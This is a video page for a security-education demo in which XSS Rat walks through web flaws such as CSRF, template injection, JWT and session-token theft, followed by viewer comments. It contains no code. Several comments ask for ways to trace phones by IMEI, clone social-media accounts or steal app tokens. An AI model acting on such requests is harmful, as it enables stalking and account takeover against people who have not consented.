XSS Rat shows us how he hacks websites in 5 minutes and get customers. He approaches companies and gives them 1 hour of free consultancy. But, he is often able to hack their website in 5 minutes - and gain a new client :) He then shows them how they can better secure their websites against actual attacks. XSS Rat's new course: davidbombal.wiki/xssratpentest // MENU // 00:00 - Coming up // Hacking websites in 5 minutes! 00:48 - Intro & Disclaimer 00:59 - How to hack websites with XSS 02:17 - Hacking websites demo 03:10 - CAPTCHA vulnerability 04:49 - CSRF token vulnerability 17:19 - Changing emails 20:36 - Client Side Template Injection 24:30 - Mass Assignment vulnerability 28:23 - Open Redirect vulnerability 31:54 - Stealing session tokens 34:44 - JWT vulnerability 38:37 - WordPress // Don't use plugins! 39:10 - Even experts can make mistakes 40:38 - Recommended security scanners 41:05 - Account takeover vulnerabilities 45:37 - Fight the cheese monster! // hackerats.com 52:00 - Thanks XSS Rat! // Free labs on hackxpert.com 52:52 - What to expect in the next video 53:26 - Conclusion // Previous video // XSS hacking: ua-cam.com/video/PzRQhpbYbeg/v-deo.html // NEW COURSE // Get XSS Rat's New Pentest course: davidbombal.wiki/xssratpentest // Demo Sites // This video: hackxpert.com/00032422342/ratsite/ Others mentioned: - hackxpert.com/labs - hackxpert.com/ratsite // David's SOCIAL // Discord: discord.com/invite/usKSyzb Twitter: twitter.com/davidbombal Instagram: instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal UA-cam: ua-cam.com/users/davidbombal // XSS Rat SOCIAL // Twitter: twitter.com/theXSSrat UA-cam: ua-cam.com/users/TheXSSrat Website: thexssrat.podia.com/ // XSS Rat's Udemy course // New Pentest course: davidbombal.wiki/xssratpentest XSS Survival Guide: www.udemy.com/course/xss-survival-guide/ // XSS Rat's courses and bootcamps // thexssrat.podia.com/ // MY STUFF // www.amazon.com/shop/davidbombal // SPONSORS // Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com Disclaimer: This video is for educational purposes only. Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Hey man.. have lost one account, when i will reset password, the homepage says email not registered.. support cant help without the right email.. Same method to get my acc dosnt work without the current password... Have u an idea to get it back ? All my life was saved into this Account...
As a developer I know I a thing or two about preventing from the basic and most common vulnerabilities/attacks. It's always good to have tools to learn how these types of "hacks" work. It's nasty how a small line of code (or lack thereof) can cause so much damage. ps. don't forget to update (patch) OpenSSL v3 folks 😛👍
These video's are really good David. I think what is key in what XSS Rat was doing, if you take for instance the CSRF example, he knows how the CSRF is implemented as a best practice. Then when he encounters an implementation that acts different, he knows that he is onto a vulnerability. I encourage the junior programmers to take a look at this. Because it's good to see the way a hacker approaches your app and the different ways of thinking. Your channel is slowly dragging me into the hacking scene... thanks
I love this and I'm trying to learn how to code. I am always getting hacked it's like I'm the person that hackers practice on. So from your page I'm learning how to protect myself. Love this page and keep it going.
Quality informative videoo!! , thank you so much for this grt explanation . I'll surely implement these procedures against the vulnerabilities , and cheer the relegion of cybersecurity 🥳
Awesome showcasing here! For folks out there.. just to share, I came across a couple of these concepts in the hack the box labs in the past. If you are keen to practice, For the jwt vulnerability, you can try it in the box called "secret", for client side template injection, its "postman".
all his points are valid. agile coupled with younger single target focussed programmers who know very little of the backend systems and only focussed on meeting tight dealines.. only going to exasperate issues further. many of them dont even understand how to fully impliment these types of controls as he points out.
Hi David, If you are afraid of getting some videos banned by UA-cam, then create a rumble account and upload those videos there. I am currently learning cybersecurity because of you.
You know a REAL SMART GEEK when you see one... They are so perfect that when they make a simple mistake- they become flustered. This guy is an amazing shell popper 🍾 🥂
Never gonna give you up.... lol. Sorry couldn't resist. Not sure how wise it is to persist 'hacks' between logins on a practice site; could potentially expose a learner to something harmful.
Hello David, your videos are so informative and interesting. Thank You so much for creating such a content. Can you please make some videos on how to test online /multiplayer game hacking/pentesting ? Thank you
This is the first video that seems a bit weird. Like, I never knew these exploits were still relevant enough to mention? It's like hearing people say: "Don't use 0000 or 1234 as a phone lock". It doesn't hurt to mention it again of course, I'm just surprised.
Is it possible to change a website content permanently? If yes then can you please give me Guess? It's my humble Request🥺. (Just for Educational purpose)
You know im etical hacker and i send many advices to many companies and sometimes want help for free and some times doesn't reply my messages or emails.
Hi sir what is the cost for joining this channel? I know the cost is already given what I'm seeing is ₹59 which is less than 💲1 , I'm assuming that you had asked 59 dollar for joining, am i right ?
we are new at computers, I am 6 and a half months old, and on my fathers lap. This is satisfying when he types my questions, so I am wondering, if you like milk?
thats all good and fine the thing is most valuable websites now a day are not vulnerable anymore and all these demos are executed on vulnerable platforms challenging is hacking a non vulnerable websites
He mentions dropbox a lot. Is dropbox a client and vulnerable to these exploits or he's implying a company like dropbox is victim to these attacks? (Box)
I have a question. Can we exploit SQLi through XSS. I mean post exploitation fr XSS to SQLi. In simple words, gaining access to the website's database using XSS vulnerability
Not all that long ago (5/6 years) there was a quite well known site (coveritlive) that had a stupid vulnerability - moderation bypass, quite embarrassing for sites that hosted chat or scores from them. At the time, I demo'd it for them on their own demo page.
Hi, I am from Pakistan, please guide me or tell the complete path to hacking, as here full guide or path is not available, i want to become a hacker , i am good at c, c++, c# , python, but want to become a hacker
XSS Rat shows us how he hacks websites in 5 minutes and get customers. He approaches companies and gives them 1 hour of free consultancy. But, he is often able to hack their website in 5 minutes - and gain a new client :) He then shows them how they can better secure their websites against actual attacks.
XSS Rat's new course: davidbombal.wiki/xssratpentest
// MENU //
00:00 - Coming up // Hacking websites in 5 minutes!
00:48 - Intro & Disclaimer
00:59 - How to hack websites with XSS
02:17 - Hacking websites demo
03:10 - CAPTCHA vulnerability
04:49 - CSRF token vulnerability
17:19 - Changing emails
20:36 - Client Side Template Injection
24:30 - Mass Assignment vulnerability
28:23 - Open Redirect vulnerability
31:54 - Stealing session tokens
34:44 - JWT vulnerability
38:37 - WordPress // Don't use plugins!
39:10 - Even experts can make mistakes
40:38 - Recommended security scanners
41:05 - Account takeover vulnerabilities
45:37 - Fight the cheese monster! // hackerats.com
52:00 - Thanks XSS Rat! // Free labs on hackxpert.com
52:52 - What to expect in the next video
53:26 - Conclusion
// Previous video //
XSS hacking: ua-cam.com/video/PzRQhpbYbeg/v-deo.html
// NEW COURSE //
Get XSS Rat's New Pentest course: davidbombal.wiki/xssratpentest
// Demo Sites //
This video: hackxpert.com/00032422342/ratsite/
Others mentioned:
- hackxpert.com/labs
- hackxpert.com/ratsite
// David's SOCIAL //
Discord: discord.com/invite/usKSyzb
Twitter: twitter.com/davidbombal
Instagram: instagram.com/davidbombal
LinkedIn: www.linkedin.com/in/davidbombal
Facebook: facebook.com/davidbombal.co
TikTok: tiktok.com/@davidbombal
UA-cam: ua-cam.com/users/davidbombal
// XSS Rat SOCIAL //
Twitter: twitter.com/theXSSrat
UA-cam: ua-cam.com/users/TheXSSrat
Website: thexssrat.podia.com/
// XSS Rat's Udemy course //
New Pentest course: davidbombal.wiki/xssratpentest
XSS Survival Guide: www.udemy.com/course/xss-survival-guide/
// XSS Rat's courses and bootcamps //
thexssrat.podia.com/
// MY STUFF //
www.amazon.com/shop/davidbombal
// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com
Disclaimer: This video is for educational purposes only.
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended.
Thank you for supporting me and this channel!
Thx for the video! 👌
Nice video
Hey! ... Lol!
Hey devid, please invite farah hawa, Vickie li, & Georgia weidman
Hey man.. have lost one account, when i will reset password, the homepage says email not registered.. support cant help without the right email..
Same method to get my acc dosnt work without the current password...
Have u an idea to get it back ?
All my life was saved into this Account...
Been following him for ages on twitter. Incredibly talented guy 👏🏻
Agreed. Wesley is great!
One of the best hacker I know, he's a genius
@@davidbombal well you too
DB is the most simplistic and most informative person
Thank you! I try to keep things simple :)
As a developer I know I a thing or two about preventing from the basic and most common vulnerabilities/attacks. It's always good to have tools to learn how these types of "hacks" work. It's nasty how a small line of code (or lack thereof) can cause so much damage. ps. don't forget to update (patch) OpenSSL v3 folks 😛👍
These video's are really good David. I think what is key in what XSS Rat was doing, if you take for instance the CSRF example, he knows how the CSRF is implemented as a best practice. Then when he encounters an implementation that acts different, he knows that he is onto a vulnerability. I encourage the junior programmers to take a look at this. Because it's good to see the way a hacker approaches your app and the different ways of thinking. Your channel is slowly dragging me into the hacking scene... thanks
Ah, uncle rat! Thanks for bringing him to your channel. Dude's awesome!
Legend. Simply the most logical, interesting, topical, informative and highly engaging teacher bar none. Thanks David.
Help me please
Thanks David , for providing quality things to the viewers
David sir, as always 🔥 putting out great content 💗🙏
Thank you! I appreciate it :)
We love these long technical videos David! Keep them coming
David, Wesley was awesome! The tutorial was very informative too! Thanks for sharing!
Thank you David and XSS Rat for the great informations, an hour went by and didn't even notice.
Great video David on cross eye scripting thanks David 👏🏾
You're welcome! Cross Site Scripting is a nightmare :(
David thank to you for bringing this delicious content to all of us who we are learning in the cybersecurity sector.
You're welcome!
I love this and I'm trying to learn how to code. I am always getting hacked it's like I'm the person that hackers practice on. So from your page I'm learning how to protect myself. Love this page and keep it going.
DB absolutely incredible and down to earth person as always thanks David for enhancing our skills and I hope your having a good day
Thank you! If I'm doing my job right, you are learning something new in every video :)
David is such a great Guy and has one of the best UA-cam channel in cyber security stuff and this was a big advertisement for rat guy...
Quality informative videoo!! , thank you so much for this grt explanation . I'll surely implement these procedures against the vulnerabilities , and cheer the relegion of cybersecurity 🥳
Squirrely bracket, squirrely bracket. Squirrel power! You go, squirrel!
Awesome showcasing here! For folks out there.. just to share, I came across a couple of these concepts in the hack the box labs in the past. If you are keen to practice, For the jwt vulnerability, you can try it in the box called "secret", for client side template injection, its "postman".
You need to be to be on rumble. Drop the mic! Be the resistance David!
Thank You Both 💖
You're welcome!
all his points are valid. agile coupled with younger single target focussed programmers who know very little of the backend systems and only focussed on meeting tight dealines.. only going to exasperate issues further. many of them dont even understand how to fully impliment these types of controls as he points out.
And also thank you Mr David, you might not remember but you assisted with one of mr projects still appreciate.
Been waiting for this to happen!! Knew it would..
Congrats Uncle Rat, only the beginning
Hi David,
If you are afraid of getting some videos banned by UA-cam, then create a rumble account and upload those videos there. I am currently learning cybersecurity because of you.
Thanks David for a fantastic video! Thanks XSS Rat!
If most people knew these things they'd pull a Ron Swanson and throw out their computers or phones. 😂
lol... I think a lot of people would agree with you.... better to live offline :)
@@davidbombal hard to do these days especially if we work in IT. 😂
i inspire to be as knowledgeable as dudes like this
Yooooo, you got uncle rat on the Chanel!
He is super awesome!!
Always great content and new things to learn love your videos David♥️ helped me in learning more ethical hacking
Thank you! I'm very happy to hear that :)
That brain must fill the whole head :D
I love when guys who don't look special show just how genius they can be.
Serious respect for XSS Rat.
His kungfu is strong :)
Hello
"Rat hack website in 5 minutes" the video : 5 3 m i n u t e s
Amazing. This is like the part 2 ;)
Thank you! Yes - based on the feedback on the previous video, I asked Wesley to cover more stuff - especially showing us demos of what is possible.
man i wish David had his own tv show
Nice way to show the use of “lay of the land” tools to use to pentest.
David An Amazing Teacher !
Please make a video on how to find mobile by IMEI number.
As I was clicking the video I was getting ready to grab my airgun to get the damn critter...
🤣
You know a REAL SMART GEEK when you see one...
They are so perfect that when they make a simple mistake- they become flustered.
This guy is an amazing shell popper 🍾 🥂
Been following rat guy for a while now. He is smart
Never gonna give you up.... lol. Sorry couldn't resist. Not sure how wise it is to persist 'hacks' between logins on a practice site; could potentially expose a learner to something harmful.
Amazing video. Thank you very much!
You're welcome! Glad you liked it!
Hello David, I hope you will answer my question yes. My question is, do you also have classes on web security?
Well done Lesley and David xxx
At 11:00 you can just click on "view source" in your payload and you"ll get all your parameters in the format you like
What about the new Tesla model pie phone and it being able to interact with neuralink
Hi, XSS Rat I am planning to become an Ethical Hacker. Where do you think that I should start from?
Hello David, your videos are so informative and interesting. Thank You so much for creating such a content.
Can you please make some videos on how to test online /multiplayer game hacking/pentesting ?
Thank you
CSRF can be exploited by merely VIEWING your code, not just clickong. Love the trick
This is the first video that seems a bit weird. Like, I never knew these exploits were still relevant enough to mention? It's like hearing people say: "Don't use 0000 or 1234 as a phone lock". It doesn't hurt to mention it again of course, I'm just surprised.
Yes wesleyyy my bro, been watching your channel a lot recently
Is it possible to change a website content permanently? If yes then can you please give me Guess? It's my humble Request🥺. (Just for Educational purpose)
pleas more sdr videos like ss7 attacks sms decryption
David
Please I have seen the courses he offers in Udemy
But I didn't know what course I would learn like this video in UA-cam? Can you tell me!
You know im etical hacker and i send many advices to many companies and sometimes want help for free and some times doesn't reply my messages or emails.
Hello Mr David can we hack Nuclear missiles ? Reply
Hi sir what is the cost for joining this channel? I know the cost is already given what I'm seeing is ₹59 which is less than 💲1 , I'm assuming that you had asked 59 dollar for joining, am i right ?
we are new at computers, I am 6 and a half months old, and on my fathers lap. This is satisfying when he types my questions, so I am wondering, if you like milk?
I wouldn't call myself a rat that's just not the animal I'd chose lol. XSS lion maybe , but rat lol
thats all good and fine the thing is most valuable websites now a day are not vulnerable anymore and all these demos are executed on vulnerable platforms challenging is hacking a non vulnerable websites
He mentions dropbox a lot. Is dropbox a client and vulnerable to these exploits or he's implying a company like dropbox is victim to these attacks? (Box)
I AM ALMOST 50 YEARS BUT I WANT TO LEARN HACKING, PLEASE TELL ME WHAT TO LEARN FIRST... THANK YOU
I love watching you guys videos they always make me go to sleep.
I have a question.
Can we exploit SQLi through XSS. I mean post exploitation fr XSS to SQLi.
In simple words, gaining access to the website's database using XSS vulnerability
best ever❤️❤️
Thank you!
A PART FROM CHAPCHA WHAT IF THE CAPTCHA IS invisible is that also a problem
There is!!! Uncle Rat!!!
that why levels of access is so important
These are very trivial examples today.
Not all that long ago (5/6 years) there was a quite well known site (coveritlive) that had a stupid vulnerability - moderation bypass, quite embarrassing for sites that hosted chat or scores from them. At the time, I demo'd it for them on their own demo page.
David u keep giving us clues 😂
Around 11:00 he could have just clicked view raw source and not had to add the & manually later.
Another Great content. Thanks, would love to watch iOS or Android hacking.
Thank you, XSS-Rat, amazing performance like always.
Nice video, also Do about api hacking
Can we get a online payment systems demo? Like stripe or square
My wife is getting really tired of these videos being my date night suggestions.
Brow you now bjorka hacker ?
Please
You can absolutely use API to solve captcha in a bot...
Amazing explanation 👏👏🙌🙌
That's why I never, ever use cookies.
Now that I understand you just close the tag and inject your code behind it I’m going on a bug hunt wish me luck😎
Thanks guys!!
He needs another user (person) to direct . May i suggest. ?
my pc was hacked and all my email account was scamed
what webbrowser is he using ?
Alone we survive, together we prosper 🐀
good stuff. Thanks both of you.
Can you make a video on how to pull a Wi-Fi password using the address of Wi-Fi
Can you do something with a flipper zero
How do I hire Wesley?
Interesting, pls I need to learn ethical hacking to protect my family.
Hello, don't be tired, how to extract emails from a website
android hacking to get cookies, cache memory, tokens to be able to log in windows from Android application cookies or cache memory...? Thanks
Please make a video on how to trace android with IMEI number. Please
Is it possible to clone a fb target id,
Please make a video on it,🥺🥺
Great video. More please.
Can anyone put me through on how I can locate an hidden item on a shopping site, would love to get assistance from pros in the computer world.
Hi, I am from Pakistan, please guide me or tell the complete path to hacking, as here full guide or path is not available, i want to become a hacker , i am good at c, c++, c# , python, but want to become a hacker